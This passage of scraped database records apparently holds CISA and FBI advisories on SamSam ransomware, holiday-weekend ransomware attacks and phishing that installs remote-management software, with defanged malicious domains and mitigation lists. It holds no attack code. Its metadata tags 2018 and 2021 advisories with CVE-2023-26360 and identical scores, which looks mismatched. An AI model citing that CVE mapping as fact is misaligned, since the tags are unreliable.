likely to pay larger ransoms.\n\nThe actors exploit Windows servers to gain persistent access to a victim\u2019s network and infect all reachable hosts. According to reporting from victims in early 2016, cyber actors used the JexBoss Exploit Kit to access vulnerable JBoss applications. Since mid-2016, FBI analysis of victims\u2019 machines indicates that cyber actors use Remote Desktop Protocol (RDP) to gain persistent access to victims\u2019 networks. Typically, actors either use brute force attacks or stolen login credentials. Detecting RDP intrusions can be challenging because the malware enters through an approved access point.\n\nAfter gaining access to a particular network, the SamSam actors escalate privileges for administrator rights, drop malware onto the server, and run an executable file, all without victims\u2019 action or authorization. While many ransomware campaigns rely on a victim completing an action, such as opening an email or visiting a compromised website, RDP allows cyber actors to infect victims with minimal detection.\n\nAnalysis of tools found on victims\u2019 networks indicated that successful cyber actors purchased several of the stolen RDP credentials from known darknet marketplaces. FBI analysis of victims\u2019 access logs revealed that the SamSam actors can infect a network within hours of purchasing the credentials. While remediating infected systems, several victims found suspicious activity on their networks unrelated to SamSam. This activity is a possible indicator that the victims\u2019 credentials were stolen, sold on the darknet, and used for other illegal activity.\n\nSamSam actors leave ransom notes on encrypted computers. These instructions direct victims to establish contact through a Tor hidden service site. After paying the ransom in Bitcoin and establishing contact, victims usually receive links to download cryptographic keys and tools to decrypt their network.\n\n### Technical Details\n\nNCCIC recommends organizations review the following SamSam Malware Analysis Reports. The reports represent four SamSam malware variants. This is not an exhaustive list.\n\n * MAR-10219351.r1.v2 \u2013 SamSam1\n * MAR-10166283.r1.v1 \u2013 SamSam2\n * MAR-10158513.r1.v1 \u2013 SamSam3\n * MAR-10164494.r1.v1 \u2013 SamSam4\n\nFor general information on ransomware, see the NCCIC Security Publication at https://www.us-cert.gov/security-publications/Ransomware.\n\n### Mitigations\n\nDHS and FBI recommend that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. System owners and administrators should review any configuration changes before implementation to avoid unwanted impacts.\n\n * Audit your network for systems that use RDP for remote communication. Disable the service if unneeded or install available patches. Users may need to work with their technology venders to confirm that patches will not affect system processes.\n * Verify that all cloud-based virtual machine instances with public IPs have no open RDP ports, especially port 3389, unless there is a valid business reason to keep open RDP ports. Place any system with an open RDP port behind a firewall and require users to use a virtual private network (VPN) to access that system.\n * Enable strong passwords and account lockout policies to defend against brute force attacks.\n * Where possible, apply two-factor authentication.\n * Regularly apply system and software updates.\n * Maintain a good back-up strategy.\n * Enable logging and ensure that logging mechanisms capture RDP logins. Keep logs for a minimum of 90 days and review them regularly to detect intrusion attempts.\n * When creating cloud-based virtual machines, adhere to the cloud provider\u2019s best practices for remote access.\n * Ensure that third parties that require RDP access follow internal policies on remote access.\n * Minimize network exposure for all control system devices. Where possible, disable RDP on critical devices.\n * Regulate and limit external-to-internal RDP connections. When external access to internal resources is required, use secure methods such as VPNs. Of course, VPNs are only as secure as the connected devices.\n * Restrict users' ability (permissions) to install and run unwanted software applications.\n * Scan for and remove suspicious email attachments; ensure the scanned attachment is its \"true file type\" (i.e., the extension matches the file header).\n * Disable file and printer sharing services. If these services are required, use strong passwords or Active Directory authentication.\n\nAdditional information on malware incident prevention and handling can be found in Special Publication 800-83, _Guide to Malware Incident Prevention and Handling for Desktops and Laptops_, from the National Institute of Standards and Technology.[[1]](<https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-83r1.pdf>)\n\n### Contact Information\n\nTo report an intrusion and request resources for incident response or technical assistance, contact NCCIC, FBI, or the FBI\u2019s Cyber Division via the following information:\n\n * NCCIC \n * [NCCICCustomerService@hq.dhs.gov](<mailto:NCCICCustomerService@hq.dhs.gov>)\n * 888-282-0870\n * FBI\u2019s Cyber Division \n * [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>)\n * 855-292-3937\n * FBI through a local field office\n\n### Feedback\n\nDHS strives to make this report a valuable tool for our partners and welcomes feedback on how this publication could be improved. You can help by answering a few short questions about this report at the following URL: https://www.us-cert.gov/forms/feedback.\n\n### References\n\n[[1] NIST SP 800-83: Guide to Malware Incident Prevention and Handling for Desktops and Laptops](<https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-83r1.pdf>)\n\n### Revisions\n\nDecember 3, 2018: Initial version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2018-12-03T12:00:00", "type": "ics", "title": "SamSam Ransomware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2018-12-03T12:00:00", "id": "AA18-337A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa18-337a", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T12:59:30", "description": "### Summary\n\n_**Immediate Actions You Can Take Now to Protect Against Ransomware** \n\u2022 Make an [offline backup ](<https://cisa.gov/sites/default/files/publications/Cyber Essentials Toolkit 5 20201015_508.pdf>)of your data. \n\u2022 Do not click on [suspicious links](<https://us-cert.cisa.gov/ncas/tips/ST04-014>). \n\u2022 If you use [RDP](<https://www.ic3.gov/Media/Y2018/PSA180927>), secure and monitor it. \n\u2022 [Update](<https://us-cert.cisa.gov/ncas/tips/ST04-006>) your OS and software. \n\u2022 Use [strong passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>). \n\u2022 __Use [multi-factor authentication](<https://us-cert.cisa.gov/ncas/tips/ST05-012>)._\n\nThe Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) have observed an increase in highly impactful ransomware attacks occurring on holidays and weekends\u2014when offices are normally closed\u2014in the United States, as recently as the Fourth of July holiday in 2021. The FBI and CISA do not currently have any specific threat reporting indicating a cyberattack will occur over the upcoming Labor Day holiday. However, the FBI and CISA are sharing the below information to provide awareness to be especially diligent in your network defense practices in the run up to holidays and weekends, based on recent actor tactics, techniques, and procedures (TTPs) and cyberattacks over holidays and weekends during the past few months. The FBI and CISA encourage all entities to examine their current cybersecurity posture and implement the recommended best practices and mitigations to manage the risk posed by all cyber threats, including ransomware.\n\nClick here for a PDF copy of this report.\n\n### Threat Overview\n\n#### **Recent Holiday Targeting**\n\nCyber actors have conducted increasingly impactful attacks against U.S. entities on or around holiday weekends over the last several months. The FBI and CISA do not currently have specific information regarding cyber threats coinciding with upcoming holidays and weekends. Cyber criminals, however, may view holidays and weekends\u2014especially holiday weekends\u2014as attractive timeframes in which to target potential victims, including small and large businesses. In some cases, this tactic provides a head start for malicious actors conducting network exploitation and follow-on propagation of ransomware, as network defenders and IT support of victim organizations are at limited capacity for an extended time.\n\n * In May 2021, leading into Mother\u2019s Day weekend, malicious cyber actors deployed DarkSide ransomware against the IT network of a U.S.-based critical infrastructure entity in the Energy Sector, resulting in a week-long suspension of operations. After DarkSide actors gained access to the victim\u2019s network, they deployed ransomware to encrypt victim data and\u2014as a secondary form of extortion\u2014exfiltrated the data before threatening to publish it to further pressure victims into paying the ransom demand.\n * In May 2021, over the Memorial Day weekend, a critical infrastructure entity in the Food and Agricultural Sector suffered a Sodinokibi/REvil ransomware attack affecting U.S. and Australian meat production facilities, resulting in a complete production stoppage.\n * In July 2021, during the Fourth of July holiday weekend, Sodinokibi/REvil ransomware actors attacked a U.S.-based critical infrastructure entity in the IT Sector and implementations of their remote monitoring and management tool, affecting hundreds of organizations\u2014including multiple managed service providers and their customers.\n\n#### **Ransomware Trends**\n\nThe FBI's Internet Crime Complaint Center (IC3), which provides the public with a trustworthy source for reporting information on cyber incidents, received 791,790 complaints for all types of internet crime\u2014a record number\u2014from the American public in 2020, with reported losses exceeding $4.1 billion. This represents a 69 percent increase in total complaints from 2019. The number of ransomware incidents also continues to rise, with 2,474 incidents reported in 2020, representing a 20 percent increase in the number of incidents, and a 225 percent increase in ransom demands. From January to July 31, 2021, the IC3 has received 2,084 ransomware complaints with over $16.8M in losses, a 62 percent increase in reporting and 20 percent increase in reported losses compared to the same time frame in 2020.This number includes only those victims who have provided information to IC3. The following ransomware variants have been the most frequently reported to FBI in attacks over the last month.\n\n * Conti\n * PYSA\n * LockBit\n * RansomEXX/Defray777\n * Zeppelin\n * Crysis/Dharma/Phobos\n\nThe destructive impact of ransomware continues to evolve beyond encryption of IT assets. Cyber criminals have increasingly targeted large, lucrative organizations and providers of critical services with the expectation of higher value ransoms and increased likelihood of payments. Cyber criminals have also increasingly coupled initial encryption of data with a secondary form of extortion, in which they threaten to publicly name affected victims and release sensitive or proprietary data exfiltrated before encryption, to further encourage payment of ransom. (See CISA\u2019s Fact Sheet: [Protecting Sensitive and Personal Information from Ransomware-Caused Data Breaches](<https://www.cisa.gov/publication/protecting-sensitive-and-personal-information>).) Malicious actors have also added tactics, such as encrypting or deleting system backups\u2014making restoration and recovery more difficult or infeasible for impacted organizations.\n\nAlthough cyber criminals use a variety of techniques to infect victims with ransomware, the two most prevalent initial access vectors are phishing and brute forcing unsecured remote desktop protocol (RDP) endpoints. Additional common means of initial infection include deployment of precursor or dropper malware; exploitation of software or operating system vulnerabilities; exploitation of managed service providers with access to customer networks; and the use of valid, stolen credentials, such as those purchased on the dark web. Precursor malware enables cyber actors to conduct reconnaissance on victim networks, steal credentials, escalate privileges, exfiltrate information, move laterally on the victim network, and obfuscate command-and-control communications. Cyber actors use this access to: \n\n * Evaluate a victim\u2019s ability to pay a ransom.\n * Evaluate a victim\u2019s incentive to pay a ransom to: \n * Regain access to their data and/or \n * Avoid having their sensitive or proprietary data publicly leaked.\n * Gather information for follow-on attacks before deploying ransomware on the victim network.\n\n### Threat Hunting\n\nThe FBI and CISA suggest organizations engage in preemptive threat hunting on their networks. Threat hunting is a proactive strategy to search for signs of threat actor activity to prevent attacks before they occur or to minimize damage in the event of a successful attack. Threat actors can be present on a victim network long before they lock down a system, alerting the victim to the ransomware attack. Threat actors often search through a network to find and compromise the most critical or lucrative targets. Many will exfiltrate large amounts of data. Threat hunting encompasses the following elements of understanding the IT environment by developing a baseline through a behavior-based analytics approach, evaluating data logs, and installing automated alerting systems. \n\n * **Understand the IT environment\u2019s routine activity and architecture by establishing a baseline.** By implementing a behavior-based analytics approach, an organization can better assess user, endpoint, and network activity patterns. This approach can help an organization remain alert on deviations from normal activity and detect anomalies. Understanding when users log in to the network\u2014and from what location\u2014can assist in identifying anomalies. Understanding the baseline environment\u2014including the normal internal and external traffic\u2014can also help in detecting anomalies. Suspicious traffic patterns are usually the first indicators of a network incident but cannot be detected without establishing a baseline for the corporate network.\n * **Review data logs.** Understand what standard performance looks like in comparison to suspicious or anomalous activity. Things to look for include: \n * Numerous failed file modifications,\n * Increased CPU and disk activity,\n * Inability to access certain files, and\n * Unusual network communications.\n * **Employ intrusion prevention systems and automated security alerting systems**\u2014such as security information event management software, intrusion detection systems, and endpoint detection and response.\n * **Deploy honeytokens** and alert on their usage to detect lateral movement.\n\nIndicators of suspicious activity that threat hunters should look for include:\n\n * Unusual inbound and outbound network traffic,\n * Compromise of administrator privileges or escalation of the permissions on an account,\n * Theft of login and password credentials,\n * Substantial increase in database read volume,\n * Geographical irregularities in access and log in patterns,\n * Attempted user activity during anomalous logon times, \n * Attempts to access folders on a server that are not linked to the HTML within the pages of the web server, and\n * Baseline deviations in the type of outbound encrypted traffic since advanced persistent threat actors frequently encrypt exfiltration.\n\nSee the joint advisory from Australia, Canada, New Zealand, the United Kingdom, and the United States on [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>) for additional guidance on hunting or investigating a network, and for common mistakes in incident handling. Also review the Ransomware Response Checklist in the [CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide](<https://www.cisa.gov/stopransomware/ransomware-guide>).\n\n#### **Cyber Hygiene Services**\n\nCISA offers a range of no-cost [cyber hygiene services](<https://www.cisa.gov/cyber-hygiene-services>)\u2014including vulnerability scanning and ransomware readiness assessments\u2014to help critical infrastructure organizations assess, identify, and reduce their exposure to cyber threats. By taking advantage of these services, organizations of any size will receive recommendations on ways to reduce their risk and mitigate attack vectors. \n\n### Ransomware Best Practices\n\nThe FBI and CISA strongly discourage paying a ransom to criminal actors. Payment does not guarantee files will be recovered, nor does it ensure protection from future breaches. Payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of malware, and/or fund illicit activities. Regardless of whether you or your organization decide to pay the ransom, the FBI and CISA urge you to report ransomware incidents to [CISA](<https://us-cert.cisa.gov/report>), a [local FBI field office](<https://www.fbi.gov/contact-us/field-offices>), or by [filing a report with IC3](<https://www.ic3.gov/Home/FileComplaint>) at [IC3.gov](<https://www.ic3.gov/>). Doing so provides the U.S. Government with critical information needed to help victims, track ransomware attackers, hold attackers accountable under U.S. law, and share information to prevent future attacks.\n\n#### **Information Requested**\n\nUpon receiving an incident report, the FBI or CISA may seek forensic artifacts, to the extent that affected entities determine such information can be legally shared, including: \n\n * Recovered executable file(s),\n * Live memory (RAM) capture,\n * Images of infected systems,\n * Malware samples, and\n * Ransom note.\n\n### Recommended Mitigations\n\nThe FBI and CISA highly recommend organizations continuously and actively monitor for ransomware threats over holidays and weekends.FBI and CISA highly recommend IT security personnel subscribe to CISA cybersecurity publications (https://public.govdelivery.com/accounts/USDHSCISA/subscriber/new?qsp=CODE_RED)\u2014and regularly visit the FBI Internet Crime Complaint Center (https://www.ic3.gov/)\u2014for the latest alerts. Additionally, the FBI and CISA recommend identifying IT security employees to be available and \"on call\" during these times, in the event of a ransomware attack. The FBI and CISA also suggest applying the following network best practices to reduce the risk and impact of compromise.\n\n#### **Make an offline backup of your data.**\n\n * Make and maintain offline, encrypted backups of data and regularly test your backups. Backup procedures should be conducted on a regular basis. It is important that backups be maintained offline as many ransomware variants attempt to find and delete or encrypt accessible backups.\n * Review your organization's backup schedule to take into account the risk of a possible disruption to backup processes during weekends or holidays.\n\n#### **Do not click on suspicious links.**\n\n * Implement a user training program and phishing exercises to raise awareness among users about the risks involved in visiting malicious websites or opening malicious attachments and to reinforce the appropriate user response to phishing and spearphishing emails.\n\n#### **If you use RDP\u2014or other potentially risky services\u2014secure and monitor.**\n\n * Limit access to resources over internal networks, especially by restricting RDP and using virtual desktop infrastructure. After assessing risks, if RDP is deemed operationally necessary, restrict the originating sources and require MFA. If RDP must be available externally, it should be authenticated via VPN.\n * Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts, log RDP login attempts, and disable unused remote access/RDP ports.\n * Ensure devices are properly configured and that security features are enabled. Disable ports and protocols that are not being used for a business purpose (e.g., RDP Transmission Control Protocol Port 3389). \n * Disable or block Server Message Block (SMB) protocol outbound and remove or disable outdated versions of SMB. Threat actors use SMB to propagate malware across organizations.\n * Review the security posture of third-party vendors and those interconnected with your organization. Ensure all connections between third-party vendors and outside software or hardware are monitored and reviewed for suspicious activity.\n * Implement listing policies for applications and remote access that only allow systems to execute known and permitted programs under an established security policy.\n * Open document readers in protected viewing modes to help prevent active content from running.\n\n#### **Update your OS and software; scan for vulnerabilities.**\n\n * Upgrade software and operating systems that are no longer supported by vendors to currently supported versions. Regularly patch and update software to the latest available versions. Prioritize timely patching of internet-facing servers\u2014as well as software processing internet data, such as web browsers, browser plugins, and document readers\u2014for known vulnerabilities. Consider using a centralized patch management system; use a risk-based assessment strategy to determine which network assets and zones should participate in the patch management program.\n * Automatically update antivirus and anti-malware solutions and conduct regular virus and malware scans.\n * Conduct regular vulnerability scanning to identify and address vulnerabilities, especially those on internet-facing devices. (See the Cyber Hygiene Services section above for more information on CISA\u2019s free services.)\n\n#### **Use strong passwords.**\n\n * Ensure [strong passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>) and challenge responses. Passwords should not be reused across multiple accounts or stored on the system where an adversary may have access.\n\n#### **Use multi-factor authentication.**\n\n * Require [multi-factor authentication ](<https://media.defense.gov/2020/Sep/22/2002502665/-1/-1/0/Multifactor_Authentication_Solutions_UOO17091520_V1.1 - Copy.PDF>)(MFA) for all services to the extent possible, particularly for remote access, virtual private networks, and accounts that access critical systems. \n\n#### **Secure your network(s): implement segmentation, filter traffic, and scan ports.**\n\n * Implement network segmentation with multiple layers, with the most critical communications occurring in the most secure and reliable layer.\n * Filter network traffic to prohibit ingress and egress communications with known malicious IP addresses. Prevent users from accessing malicious websites by implementing URL blocklists and/or allowlists.\n * Scan network for open and listening ports and close those that are unnecessary.\n * For companies with employees working remotely, secure home networks\u2014including computing, entertainment, and Internet of Things devices\u2014to prevent a cyberattack; use separate devices for separate activities; and do not exchange home and work content. \n\n#### **Secure your user accounts.**\n\n * Regularly audit administrative user accounts and configure access controls under the principles of least privilege and separation of duties.\n * Regularly audit logs to ensure new accounts are legitimate users.\n\n#### **Have an incident response plan.**\n\n * Create, maintain, and exercise a basic cyber incident response plan that: \n * Includes procedures for response and notification in a ransomware incident and\n * Plans for the possibility of critical systems being inaccessible for a period of time.\n\n**Note: **for help with developing your plan, review available incident response guidance, such as the [Public Power Cyber Incident Response Playbook ](<https://www.publicpower.org/system/files/documents/Public-Power-Cyber-Incident-Response-Playbook.pdf>)and the Ransomware Response Checklist in the [CISA-MS-ISAC Joint Ransomware Guide](<https://cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware Guide_S508C_.pdf>).\n\n#### **Use the Ransomware Response Checklist in case of infection.**\n\nIf your organization is impacted by a ransomware incident, the FBI and CISA recommend the following actions.\n\n * Follow the Ransomware Response Checklist on p. 11 of the [CISA-MS-ISAC Joint Ransomware Guide](<https://cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware Guide_S508C_.pdf>).\n * Scan your backups. If possible, scan your backup data with an antivirus program to check that it is free of malware.\n\n### Additional Resources\n\nFor additional resources related to the prevention and mitigation of ransomware, go to [https://www.stopransomware.gov](<https://www.stopransomware.gov/>) as well as the [CISA-MS-ISAC Joint Ransomware Guide](<https://cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware Guide_S508C_.pdf>). Stopransomware.gov is the U.S. Government\u2019s new, official one-stop location for resources to tackle ransomware more effectively. Additional resources include:\n\n * CISA Insights: [Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses](<https://www.cisa.gov/sites/default/files/publications/CISA Insights_Guidance-for-MSPs-and-Small-and-Mid-sized-Businesses_S508C.pdf>)\n * CISA: [Cyber Essentials](<https://www.cisa.gov/cyber-essentials>)\n * NIST SP 800-83 Rev. 1: [Guide to Malware Incident Prevention and Handling for Desktops and Laptops](<https://csrc.nist.gov/publications/detail/sp/800-83/rev-1/final>)\n * NIST SP 800-46 Rev. 2: [Guide to Enterprise Telework, Remote Access, and Bring Your Own Device (BYOD) Security](<https://csrc.nist.gov/publications/detail/sp/800-46/rev-2/final>)\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at[ www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. If you have any further questions related to this Joint Cybersecurity Advisory, or to request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.gov](<mailto:Central@cisa.gov>).\n\n### Revisions\n\nAugust 31, 2021: Initial Version|September 2, 2021: Updated mitigations to better align with Ransomware Response Checklist.|February 10, 2022: Updated broken URL\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2022-02-10T12:00:00", "type": "ics", "title": "Ransomware Awareness for Holidays and Weekends", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2022-02-10T12:00:00", "id": "AA21-243A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-243a", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T12:50:35", "description": "### Summary\n\nThe Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), and Multi-State Information Sharing and Analysis Center (MS-ISAC) (hereafter referred to as the \u201cauthoring organizations\u201d) are releasing this joint Cybersecurity Advisory (CSA) to warn network defenders about malicious use of legitimate remote monitoring and management (RMM) software. In October 2022, CISA identified a widespread cyber campaign involving the malicious use of legitimate RMM software. Specifically, cyber criminal actors sent phishing emails that led to the download of legitimate RMM software\u2014ScreenConnect (now ConnectWise Control) and AnyDesk\u2014which the actors used in a refund scam to steal money from victim bank accounts.\n\nAlthough this campaign appears financially motivated, the authoring organizations assess it could lead to additional types of malicious activity. For example, the actors could sell victim account access to other cyber criminal or advanced persistent threat (APT) actors. This campaign highlights the threat of malicious cyber activity associated with legitimate RMM software: after gaining access to the target network via phishing or other techniques, malicious cyber actors\u2014from cybercriminals to nation-state sponsored APTs\u2014are known to use legitimate RMM software as a backdoor for persistence and/or command and control (C2).\n\nUsing portable executables of RMM software provides a way for actors to establish local user access without the need for administrative privilege and full software installation\u2014effectively bypassing common software controls and risk management assumptions.\n\nThe authoring organizations strongly encourage network defenders to review the Indicators of Compromise (IOCs) and Mitigations sections in this CSA and apply the recommendations to protect against malicious use of legitimate RMM software.\n\nDownload the PDF version of this report: pdf, 608 kb.\n\nFor a downloadable copy of IOCs, see AA23-025.stix (STIX, 19 kb).\n\n### Technical Details\n\n#### **Overview**\n\nIn October 2022, CISA used trusted third-party reporting, to conduct retrospective analysis of [EINSTEIN](<https://www.cisa.gov/einstein>)\u2014a federal civilian executive branch (FCEB)-wide intrusion detection system (IDS) operated and monitored by CISA\u2014and identified suspected malicious activity on two FCEB networks:\n\n * In mid-June 2022, malicious actors sent a phishing email containing a phone number to an FCEB employee\u2019s government email address. The employee called the number, which led them to visit the malicious domain, myhelpcare[.]online.\n * In mid-September 2022, there was bi-directional traffic between an FCEB network and myhelpcare[.]cc.\n\nBased on further EINSTEIN analysis and incident response support, CISA identified related activity on many other FCEB networks. The authoring organizations assess this activity is part of a widespread, financially motivated phishing campaign and is related to malicious typosquatting activity reported by Silent Push in the blog post [Silent Push uncovers a large trojan operation featuring Amazon, Microsoft, Geek Squad, McAfee, Norton, and Paypal domains](<https://www.silentpush.com/blog/silent-push-uncovers-a-large-phishing-operation-featuring-amazon-geek-squad-mcafee-microsoft-norton-and-paypal-domains>).\n\n#### **Malicious Cyber Activity**\n\nThe authoring organizations assess that since at least June 2022, cyber criminal actors have sent help desk-themed phishing emails to FCEB federal staff\u2019s personal, and government email addresses. The emails either contain a link to a \u201cfirst-stage\u201d malicious domain or prompt the recipients to call the cybercriminals, who then try to convince the recipients to visit the first-stage malicious domain. See figure 1 for an example phishing email obtained from an FCEB network.\n\n\n\n_Figure 1_: _Help desk_-_themed phishing email example_\n\nThe recipient visiting the first-stage malicious domain triggers the download of an executable. The executable then connects to a \u201csecond-stage\u201d malicious domain, from which it downloads additional RMM software.\n\nCISA noted that the actors did not install downloaded RMM clients on the compromised host. Instead, the actors downloaded AnyDesk and ScreenConnect as self-contained, portable executables configured to connect to the actor\u2019s RMM server.\n\n**Note:** Portable executables launch within the user\u2019s context without installation. Because portable executables do not require administrator privileges, they can allow execution of unapproved software even if a risk management control may be in place to audit or block the same software\u2019s installation on the network. Threat actors can leverage a portable executable with local user rights to attack other vulnerable machines within the local intranet or establish long term persistent access as a local user service.\n\nCISA has observed that multiple first-stage domain names follow naming patterns used for IT help/support themed social-engineering, e.g., hservice[.]live, gscare[.]live, nhelpcare[.]info, deskcareme[.]live, nhelpcare[.]cc). According to Silent Push, some of these malicious domains impersonate known brands such as, Norton, GeekSupport, Geek Squad, Amazon, Microsoft, McAfee, and PayPal.[[1](<https://www.silentpush.com/blog/silent-push-uncovers-a-large-phishing-operation-featuring-amazon-geek-squad-mcafee-microsoft-norton-and-paypal-domains>)] CISA has also observed that the first-stage malicious domain linked in the initial phishing email periodically redirects to other sites for additional redirects and downloads of RMM software.\n\n#### **Use of Remote Monitoring and Management Tools**\n\nIn this campaign, after downloading the RMM software, the actors used the software to initiate a refund scam. They first connected to the recipient\u2019s system and enticed the recipient to log into their bank account while remaining connected to the system. The actors then used their access through the RMM software to modify the recipient\u2019s bank account summary. The falsely modified bank account summary showed the recipient was mistakenly refunded an excess amount of money. The actors then instructed the recipient to \u201crefund\u201d this excess amount to the scam operator. \nAlthough this specific activity appears to be financially motivated and targets individuals, the access could lead to additional malicious activity against the recipient\u2019s organization\u2014from both other cybercriminals and APT actors. Network defenders should be aware that:\n\n * Although the cybercriminal actors in this campaign used ScreenConnect and AnyDesk, threat actors can maliciously leverage any legitimate RMM software.\n * Because threat actors can download legitimate RMM software as self-contained, portable executables, they can bypass both administrative privilege requirements and software management control policies.\n * The use of RMM software generally does not trigger antivirus or antimalware defenses.\n * Malicious cyber actors are known to leverage legitimate RMM and remote desktop software as backdoors for persistence and for C2.[[2](<https://www.cisa.gov/uscert/ncas/alerts/aa22-277a>)],[[3](<https://www.cisa.gov/uscert/ncas/alerts/aa22-055a>)],[[4](<https://www.cisa.gov/uscert/ncas/alerts/aa22-152a>)],[[5](<https://www.cisa.gov/uscert/ncas/alerts/aa21-042a>)],[[6](<https://www.cisa.gov/uscert/ncas/alerts/aa20-301a>)],[[7](<https://www.cisa.gov/uscert/ncas/alerts/aa20-107a>)],[[8](<https://www.fbi.gov/contact-us/field-offices/boston/news/press-releases/fbi-warns-public-to-beware-of-tech-support-scammers-targeting-financial-accounts-using-remote-desktop-software>)]\n * RMM software allows cyber threat actors to avoid using custom malware.\n\nThreat actors often target legitimate users of RMM software. Targets can include managed service providers (MSPs) and IT help desks, who regularly use legitimate RMM software for technical and security end-user support, network management, endpoint monitoring, and to interact remotely with hosts for IT-support functions. These threat actors can exploit trust relationships in MSP networks and gain access to a large number of the victim MSP's customers. MSP compromises can introduce significant risk\u2014such as [ransomware](<https://www.cisa.gov/uscert/kaseya-ransomware-attack>) and [cyber espionage](<https://cisa.gov/uscert/sites/default/files/publications/Chinese-Cyber-Activity-Targeting-Managed-Service-Providers.pdf>)\u2014to the MSP\u2019s customers.\n\nThe authoring organizations strongly encourage network defenders to apply the recommendations in the Mitigations section of this CSA to protect against malicious use of legitimate RMM software.\n\n### **INDICATORS OF COMPROMISE**\n\nSee table 1 for IOCs associated with the campaign detailed in this CSA.\n\n_Table 1: Malicious Domains and IP addresses observed by CISA_\n\n**Domain**\n\n| \n\n**Description**\n\n| \n\n**Date(s) Observed** \n \n---|---|--- \n \nwin03[.]xyz\n\n| \n\nSuspected first-stage malware domain\n\n| \n\nJune 1, 2022\n\nJuly 19, 2022 \n \nmyhelpcare[.]online\n\n| \n\nSuspected first-stage malware domain\n\n| \n\nJune 14, 2022 \n \nwin01[.]xyz\n\n| \n\nSuspected first-stage malware domain\n\n| \n\nAugust 3, 2022\n\nAugust 18, 2022 \n \nmyhelpcare[.]cc\n\n| \n\nSuspected first-stage malware domain\n\n| \n\nSeptember 14, 2022 \n \n247secure[.]us\n\n| \n\nSecond-stage malicious domain\n\n| \n\nOctober 19, 2022\n\nNovember 10, 2022 \n \nAdditional resources to detect possible exploitation or compromise:\n\n * Silent Push: [Silent Push uncovers a large trojan operation featuring Amazon, Microsoft, Geek Squad, McAfee, Norton, and Paypal domains](<https://www.silentpush.com/blog/silent-push-uncovers-a-large-phishing-operation-featuring-amazon-geek-squad-mcafee-microsoft-norton-and-paypal-domains>).\n\n### Mitigations\n\nThe authoring organizations encourage network defenders to:\n\n * Implement best practices to block phishing emails. See [CISA\u2019s Phishing Infographic](<https://cisa.gov/sites/default/files/publications/phishing-infographic-508c.pdf>) for more information.\n * Audit remote access tools on your network to identify currently used and/or authorized RMM software.\n * Review logs for execution of RMM software to detect abnormal use of programs running as a portable executable.\n * Use security software to detect instances of RMM software only being loaded in memory.\n * Implement application controls to manage and control execution of software, including allowlisting RMM programs. \n * See NSA Cybersecurity Information sheet [Enforce Signed Software Execution 